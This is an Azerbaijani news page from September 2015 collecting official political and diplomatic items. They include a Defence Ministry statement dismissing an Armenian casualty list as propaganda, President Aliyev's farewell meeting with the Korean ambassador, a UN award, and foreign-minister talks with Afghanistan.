​Müdafiə Nazirliyi bəzi yerli kütləvi informasiya vasitələrini erməni tərəfinin xüsusi təbliğat fəaliyyətində iştirak etməkdən çəkinməyə çağırır "Müdafiə Nazirliyi bəzi yerli kütləvi informasiya vasitələrini erməni tərəfinin xüsusi təbliğat fəaliyyətində iştirak etməkdən çəkinməyə çağırır". Faktinfo  xəbər verir ki, Azərbaycan Müdafiə Nazirliyinin sentyabrın 29-da yaydığı bəyanatda belə deyilir. Nazirlikdən bildirilib ki, Ermənistanın bəzi elekton kütləvi informasiya vasitələri tərəfindən guya sentyabrın 28-də həlak olan Azərbaycan Silahlı Qüvvələrinin hərbi qulluqçularının ad-soyadları da göstərilməklə yayılmış məlumatın heç bir əsası yoxdur: "Bu kimi ucuz, tam cəfəng xarakterli məlumatlar yalnız erməni ictimaiyyətini aldatmaq məqsədi daşıyır və bir daha sübut edir ki, düşmən tərəfi mənəvi-psixoloji cəhətdən düşkün vəziyyətdədir.Rəsmi olaraq bildiririk ki, adları siyahıda göstərilən şəxslər ümumiyyətlə Silahlı Qüvvələrimizdə yoxdur.Müdafiə Nazirliyi cəbhədə baş verən hadisələr barədə ictimaiyyətə mütəmadi xəbər verir və son günlər qoşunların təmas xəttində gedən döyüşlərdə şəhid olanlar barədə də tərəfimizdən rəsmi məlumatlar verilib.Bildiririk ki, bu kimi xəbərlər erməni tərəfinin xüsusi təbliğatının bir hissəsidir və bəzi yerli elekton kütləvi informasiya vasitələri də bu fəaliyyətlərdə iştiraka qoşulurlar. Müdafiə Nazirliyi erməni tərəfinin və onların məlumatlarını tirajlayan, sensasiya ardınca qaçan bəzi yerli KİV orqanlarının sayıqlamalarına da şərh verməyəcək. Bu səbəbdən də bir daha kütləvi informasiya vasitələrinin nümayəndələrindən düşmən təxribatlarına uymamağı və yalnız dəqiqləşdirilmiş rəsmi məlumatları yaymağı tövsiyə edirik".

29 Sentyabr 2015 4:28

Prezident İlham Əliyev Koreyanın Azərbaycandakı səfirini diplomatik fəaliyyətinin başa çatması ilə əlaqədar qəbul edib

7b0ebecc-99f9-4d67-82bc-1aad498a5c3e_292

Səfir gələcəkdə daha çox Koreya şirkətinin Azərbaycanda fəaliyyət göstərəcəyinə ümidvar olduğunu bildirib Azərbaycan Respublikasının Prezidenti İlham Əliyev sentyabrın 29-da Koreya Respublikasının ölkədəki fövqəladə və səlahiyyətli səfiri Çoi Suk İni diplomatik fəaliyyətinin başa çatması ilə əlaqədar qəbul edib. Faktinfo-nun xəbərinə görə, Prezident İlham Əliyev Koreya Respublikasının baş naziri Çanq Honqvonun ölkəyə səfərini və onunla keçirdiyi görüşləri məmnunluqla xatırladıb. Azərbaycan Respublikası ilə Koreya Respublikası arasında mədəniyyət sahəsində əməkdaşlığın uğurla inkişaf etdiyini qeyd edən dövlətinin başçısı səfir Çoi Suk İnin ölkədəki diplomatik fəaliyyəti dövründə keçirilən çoxlu sayda tədbirlərin iki xalqın daha da yaxınlaşması baxımından əhəmiyyətini vurğulayıb. Koreya şirkətlərinin Azərbaycanda uğurlu fəaliyyətinə toxunan Prezident İlham Əliyev Azərbaycan ilə Koreya arasında mövcud olan sıx əməkdaşlıq əlaqələrinin gələcəkdə də davam etdiriləcəyinə əminliyini bildirib. Dövlət başçısı səfirin Azərbaycan-Koreya ikitərəfli əlaqələrinin genişləndirilməsi işinə verdiyi töhfəni yüksək qiymətləndirib. Koreya hökuməti başçısının ölkəmizə ötənilki səfərinə toxunan Çoi Suk İn bildirdi ki, Azərbaycanın Koreya ilə sıx əməkdaşlıq əlaqələrini genişləndirmək niyyətində olması Baş nazir Çanq Honqvonda böyük təəssürat yaratmışdır. Diplomat səfirlik tərəfindən ölkəmizdə təşkil olunan irimiqyaslı mədəni tədbirlərin əhəmiyyətini vurğulayaraq bu sahədə Azərbaycan hökumətinin dəstəyini yüksək qiymətləndirdi. Azərbaycan ilə Koreya arasında iqtisadi əməkdaşlıq məsələlərindən danışan səfir Çoi Suk İn gələcəkdə daha çox Koreya şirkətinin Azərbaycanda fəaliyyət göstərəcəyinə ümidvar olduğunu bildirib.

29 Sentyabr 2015 2:07

​Yekaterinburqda IX Azərbaycan-Rusiya regionlararası forum keçiriləcək

4397d942-a6f1-40e5-b131-e81f8b15a107_292

Forumda sənaye, kənd təsərrüfatı, nəqliyyat, turizm sahələrində ikitərəfli əməkdaşlığın dərinləşdirilməsi məsələləri müzakirə olunacaq Sentyabrın 30-da Yekaterinburqda dövlət qurumları, regional hakimiyyət orqanları nümayəndələri, millət vəkilləri, ekspertlər və iş adamları, media, həmçinin iki ölkənin qeyri-hökumət təşkilatları nümayəndələrinin iştirakı ilə Azərbaycan-Rusiya regionlararası IX forum işə başlayacaq. Bu barədə Faktinfo  Rusiya KİV-lərinə istinadən xəbər verir.Forumun gedişində iki ölkənin regionları arasında sənaye, kənd təsərrüfatı, nəqliyyat, turizm sahəsində əməkdaşlıq, eləcə də Rusiya və Azərbaycan arasında humanitar əlaqələrin inkişafı və dərinləşdirilməsi məsələləri müzakirə olunacaq.Təşkilatçıların məlumatına görə, builki forumun yalnız plenar iclasında iştirak edəcək nümayəndələrin sayı 1200 nəfərə çatacağı planlaşdırılır.Tədbirdə Rusiya prezidentinin Xarici ölkələrlə regionlararası və mədəni əlaqələr idarəsinin rəhbəri Vladimir Çernov, Azərbaycan Respublikası Prezidentinin ictimai-siyasi məsələlər üzrə köməkçisi Əli Həsənov, Rusiyanın Bakıdakı səfiri Vladimir Doroxin, Azərbaycanın Moskvadakı səfiri Polad Bülbüloğlu, Sverdlovsk vilayətinin qubernatoru Yevgeni Kuyvaşev, eləcə də bir sıra digər Rusiya və Azərbaycan regionlarının rəhbərləri iştirak edəcəklər. Qeyd edək ki, Rusiya-Azərbaycan forumları 2010-cu ildən, növbə ilə Azərbaycan və Rusiyada keçirilir. Bu forumlar Volqoqrad, Həştərxan, Qəbələ və iki dəfə Bakıda baş tutub.

29 Sentyabr 2015 12:36

​Dağıstan respublikasının rəhbəri Azərbaycanla fəal əməkdaşlıq etməyə çağırıb

9321bdb4-87ff-4e4c-928e-ae8377cb6993_292

Azərbaycan sürətlə inkişaf edən ölkədir Dağıstan prezidenti Ramazan Abdulatipov Respublika Xalq Məclisinin 53-cü sessiyasında iştirak edib. Faktinfo  "RİA-Dağıstan"a istinadən xəbər verir ki, sessiya zamanı Ramazan Abdulatipov Tlyaratinski və Rutulski rayonları arasında 27 kilometrlik Dağıstan dairəvi yolunun tikintisi ilə bağlı deputat Fikrət Rəcəbovun təklifini şərh edib. "Bu strateji və iqtisadi cəhətdən mühüm yoldur. Bizim tarixən Gürcüstan və Azərbaycanla çox fəal əməkdaşlıq edən bir sıra rayonlarımız olub. Sonradan məlum səbəblərdən bu əməkdaşlıq dayandırılıb. Bu gün biz özümüz özümüzü təcrid edirik, lakin buna səbəb nədir? Biz qüdrətli ölkəyik və əməkdaşlığa açıq olmalıyıq. Qonşu ölkələrlə və orada yaşayan xalqlarla iqtisadi, mədəni əlaqələri inkişaf etdirməliyik", - R. Abdulatipov bildirib. O, hökumətə, Dağıstan Xalq Məclisi ilə birgə bu məsələlərlə yaxından məşğul olmaq tapşırığını verib.Dağıstan rəhbərinin sözlərinə görə, sərhədyanı əməkdaşlıq sahəsində hələ ki, nəzərə çarpacaq heç bir nəticə yoxdur: "Bu sahədə, demək olar ki, heç bir fəaliyyət hiss olunmur. Azərbaycanla hər hansı bir müştərək layihə yoxdur, baxmayaraq ki, Azərbaycan sürətlə inkişaf edən ölkədir. Biz öz coğrafi mövqeyimizdən və 5 ölkə ilə sərhədimizin olmasından istifadə etmirik".

29 Sentyabr 2015 11:16

Səməd Seyidov Avropanı tənqid etdi

tryrhtrh

  "Azərbaycanda qaçqın və məcburi köçkünlərin normal həyat sürmələri üçün bütün zəruri şərait yaradılıb" Bu fikirləri Avropa Şurası Parlament Assambleyasının (AŞ PA) dünən öz işinə başlayan payız plenar sessiyasında qurumun Bürosunun və Daimi komitəsinin görülən işlər barədə Andreas Qros tərəfindən hazırlanan hesabatı ətrafında çıxışında Azərbaycanın qurumda nümayəndə heyətinin sədri Səməd Seyidov deyib. Millət vəkili çıxışında Azərbaycanın 20 ildən artıqdır qaçqın və məcburi köçkün problemi ilə üzləşdiyini vurğulayıb: "20 ildən çoxdur ki, Azərbaycan qaçqın və məcburi köçkün problemi ilə üzləşib. 9 milyon əhalinin 1 milyondan çoxu qaçqın və məcburi köçkün vəziyyətindədir. Biz bu vəziyyəti idarə edə bildik. Onların cəmiyyətə inteqrasiya olması və normal həyat sürmələri üçün bütün zəruri şərait yaradıldı. Türkiyədəki vəziyyətə nəzər salaq. Ölkə 2 milyon suriyalı qaçqını öz ərazisində qəbul edib. Türkiyə bunun üçün 6 milyard dollardan çox pul xərcləyib. Bu gün Macarıstanı təbrik etmək istəyirəm. Siyasi qrupun iclasında Macarıstan rəsmisi bizə Şengen zonasının "cəbhə xəttində" olmanın nə qədər çətin olduğunu dedi. Sual edirəm "Niyə görə bu üç ölkə çətinliklərlə də olsa, bu problemi idarə edə bilirlər?" Əlbəttə, problemlər var. Çünki Azərbaycan, Türkiyə və Macarıstan bununla bağlı qurumlara malikdir. Amma Avropa İttifaqı belə qurumlara malik deyil". S.Seyidov çıxışında bu cür böhranlı vəziyyətlərin idarə olunmasında hökumət institutlarının rolunun vacibliyini qeyd edib: "20 ildən artıqdır ki, Assambleyada hökumət qurumlarının deyil, qeyri-hökumət təşkilarının daha görünəkli olması üçün hər şey edildi. Amma bu gün dövlət, parlament, hökumət olmadan bu böhranın həll olunmasının mümkünsüzlüyünü görürük. Elə etmək lazımdır ki, hər bir ölkədə parlamentlər və hökumətlər öz parlament və hökumət institutlarının rolu və fəaliyyətlərini dağıtmasınlar. Xöşbəxtlikdən, Assambleya bunu dərk etməyə başlayır". (trend)

29 Sentyabr 2015 10:04

BMT-nin İlham Əliyevə verdiyi ödülün anlamı və tarixi…

nhgnhgnghm

Bu mükafat ölkənin kənd təsərrüfatına xarici sərmayədarların marağını artırır Birləşmiş Millətlər Təşkilatının Davamlı İnkişaf üçün Cənub-Cənub İdarəedici Komitəsi Azərbaycanı və prezident İlham Əliyevi Cənub-Cənub mükafatı ilə təltif edib.Azərbaycan prezidentinin adından xarici işlər naziri Elmar Məmmədyarov mükafatı Nyu-Yorkda BMT-nin mənzil qərargahında qəbul eləyib.Cənub-Cənub mükafatı BMT-nin Ərzaq və Kənd Təsərrüfatı Təşkilatı, Davamlı İnkişaf üçün Cənub-Cənub İdarəedici Komitəsi, Beynəlxalq Telekommunikasiya İttifaqı, Cənub-Cənub Əməkdaşlığı üzrə Beynəlxalq Təşkilatı və bir sıra BMT-yə üzv dövlətlər, agentliklər və fondlar tərəfindən təsis olunub.Sözügedən mükafat BMT-nin hesabatlarına əsasən kənd təsərrüfatı və ərzaq təhlükəsizliyi, Minilliyin İnkişaf məqsədlərində əsaslı irəliləyişlərə nail olmuş ölkələrə verilir. Azərbaycan 2015-ci il üzrə sözügedən mükafata layiq görülüb.Xarici İşlər Nazirliyindən verilən açıqlamaya görə, əhalinin sosial rifahının yaxşılaşdırılması istiqamətində ölkə rəhbərliyinin şəxsi iradəsi, bununla əlaqədar həyata keçirilmiş dövlət proqramları, savadsızlığın və yoxsulluğun minimuma endirilməsi və Minilliyin İnkişaf Məqsədlərinin uğurla həyata keçirilməsi istiqamətində görülmüş tədbirlərə görə Azərbaycan Respublikasının Prezidenti İlham Əliyev Cənub-Cənub mükafatı ilə təltif olunub.Ekspertlər bildirirlər ki, Cənub-Cənub mükafatının bundan əvvəlki illərdə verildiyi ölkələr üçün bu mükafat sonrakı illərdə üstünlüklər yaradıb. Belə ki, bu mükafat verildiyi ölkələrin kənd təsərrüfatına xarici sərmayədarların marağını artırıb. Kənd təsərrüfatına investisiya qoyulmalarına və beləliklə də sözügedən sahədə ciddi inkişafa təkan verib. (musavat.com)

29 Sentyabr 2015 9:38

Elmar Məmmədyarov əfqan həmkarı ilə görüşdü

  Xarici işlər naziri Nazir Elmar Məmmədyarov 27 sentyabr 2015-ci il tarixində BMT Baş Assambleyasının 70-ci sessiyası çərçivəsində Əfqanıstan İslam Respublikasının xarici işlər naziri Səlahəddin Rəbbani ilə görüşüb Bu barədə Xarici İşlər Nazirliyindən Faktinfo.az-a verilən məlumatda bildirilir Görüş zamanı tərəflər Azərbaycan ilə Əfqanıstan arasında əlaqələrin inkişafının məmnunluq doğurduğunu qeyd etdilər. Azərbaycanın ikitərəfli və çoxtərəfli əsasda Əfqanıstana göstərdiyi dəstək yüksək qiymətləndirildi və iki ölkə arasında nəqliyyat, enerji, təhsil və digər sahələrdə əməkdaşlıq üçün əlverişli imkanların olduğu bildirildi. Azərbaycanın BMT Baş Assambleyasının 70-ci sessiyası çərçivəsində keçirilən Davamlı İnkişaf Məqsədləri üzrə Zirvə toplantısının işində fəal iştirakı, Minilliyin İnkişaf Məqsədlərinin həyata keçirilməsində əldə etdiyi nailiyyətləri xüsusilə qeyd olunaraq, ölkəmizin uğurlu siyasi, iqtisadi və sosial inkişaf modelinin Əfqanıstan üçün maraqlı bir nümunə olduğu bildirildi. Nazir Elmar Məmmədyarov Azərbaycanın təşəbbüsü ilə regionda həyata keçirilən irimiqyaslı nəqliyyat və enerji layihələri haqqında məlumat verərək, bu layihələrin bütün region boyunca BMT tərəfindən müəyyən edilən davamlı inkişaf hədəflərinə, regional əməkdaşlığa xidmət etdiyini və regionun nəqliyyat və enerji mənzərəsini əsaslı şəkildə dəyişdiyini diqqətə çatdırdı. Bakı-Tbilisi-Qars layihəsinin tezliklə fəaliyyətə başlayacağını qeyd edən nazir bu nəqliyyat infrastrukturunun yük daşımalarının, ticari-iqtisadi əlaqələrin və insanlararası təmasların artmasına xidmət edəcəyini və gələcək perspektivdə regional nəqliyyat qovşağı vasitəsilə Əfqanıstanın da onun imkanlarından istifadə edə biləcəyini diqqətə çatdırdı. Səlahəddin Rəbbani ölkəsinin Türkmənistan-Əfqanıstan-Pakistan-Hindistan ərazisindən keçəcək (TAPİ) qaz boru kəmərinin təməl qoyma mərasimin bu ilin sonunda həyata keçirilməsinin nəzərdə tutulduğu və Türkmənistan-Əfqanıstan-Tacikistan dəmir yolu xəttinin tikintisinin davam etdiyi barəsində məlumat verərək, davamlı regional inkişaf baxımdan nəqliyyat infrastrukturlarının əhəmiyyətini qeyd etdi. Elmar Məmmədyarov bir-birini tamamlayan və regional nəqliyyat qovşağının yaranmasına xidmət edən bu layihələrin həyata keçirilməsi ilə əlaqədar sərhəd tənzimlənməsi, təhlükəsizliyin təminatı, yolların tikintisi və sair bu kimi məsələlərin müzakirəsinin mühüm olduğunu qeyd edərək, bu məqsədlə region dövlətlərinin iştirakı ilə beynəlxalq konfransın keçirilməsinin zəruri olduğunu diqqətə çatdırdı. Görüşdə qarşılıqlı maraq doğuran regional məsələlər ətrafında fikir mübadiləsi aparıldı.

28 Sentyabr 2015 10:21

Fakt

Bizi izləyin